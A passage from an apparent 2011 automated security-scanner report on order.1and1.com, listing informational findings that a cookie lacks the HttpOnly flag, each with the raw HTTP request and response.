Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:55 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=4a2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:57:02 GMT; Path=/
ETag: 157a157c4870deee2d847106f79230e2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18630


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.19. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsMerchandise

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsMerchandise HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:42:45 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7baf8e23846d6000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=E774DB4A4A0EB5F696B7948BC9A831E3.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.20. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsNewsletter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsNewsletter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:38 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:59:45 GMT; Path=/
ETag: 63515a3a29b9c6da1d454cc05fbe4914
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18434


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.21. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsNewsletter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsNewsletter HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:45:29 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2a108f85d005a000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter;jsessionid=8E8CD48E54F5EC2976D3A901BCB12DF2.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.22. http://order.1and1.com/xml/order/FeatureControlCenter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureControlCenter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureControlCenter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:40:00 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Gdms7Pj81Xl5eWGthaC5mYC0fKWJVTydVSEIqLisrKigqKCUlKCchJCgbHRwbGFRCbmNlcystKFgxW2owIyQgHyQgHiEfMDgvLjdvcDYrMmJrMSQlISAlIh8iHSA4MTI=; Expires=Fri, 07-Apr-2079 21:54:07 GMT; Path=/
ETag: c53f0aeb8d5968fbc0f0b623806a385a
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17592


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.23. http://order.1and1.com/xml/order/FeatureControlCenter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureControlCenter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureControlCenter HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:50 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=73692ad413d39c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureControlCenter;jsessionid=1B51466ABA469A1856198D8F289AA6ED.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.24. http://order.1and1.com/xml/order/FeatureDatabaseAccess  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseAccess

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDatabaseAccess HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:40:21 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=39c7e664d5cb4800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseAccess;jsessionid=0EEDDFFA9977302FD804911AC8DEF8FF.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.25. http://order.1and1.com/xml/order/FeatureDatabaseDatabase  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseDatabase

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:40:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=4a2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:54:26 GMT; Path=/
ETag: 6a692a38f8ce7adf0db3d89ed7606ff0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17942


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.26. http://order.1and1.com/xml/order/FeatureDatabaseDatabase  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseDatabase

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDatabaseDatabase HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:40:07 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=37397528d82e9400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseDatabase;jsessionid=27663FC3D5B3D61A6AFACF2EAFEA8C46.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.27. http://order.1and1.com/xml/order/FeatureDatabaseMssql  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseMssql

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDatabaseMssql HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:40:38 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=282c3b09cb862800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseMssql;jsessionid=49F80D961469395540AF07C120006E83.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.28. http://order.1and1.com/xml/order/FeatureDomainDns  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDns

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDomainDns HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:44 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2a749cb4eb8e1800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainDns;jsessionid=699406EC5243591A37F944E2D6F57ECA.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.29. http://order.1and1.com/xml/order/FeatureDomainDns  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDns

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDomainDns;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:39:50 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=XZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:53:57 GMT; Path=/
ETag: d73323ab9fa4652a9df5494f55f0fb43
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16275


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.30. http://order.1and1.com/xml/order/FeatureDomainDomains  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDomains

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDomainDomains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:11 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3b7517c1ba0d2800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainDomains;jsessionid=9570F2B6FB8AFD7FE7087C16F49B1CA1.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.31. http://order.1and1.com/xml/order/FeatureDomainDomains  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDomains

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureDomainDomains;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
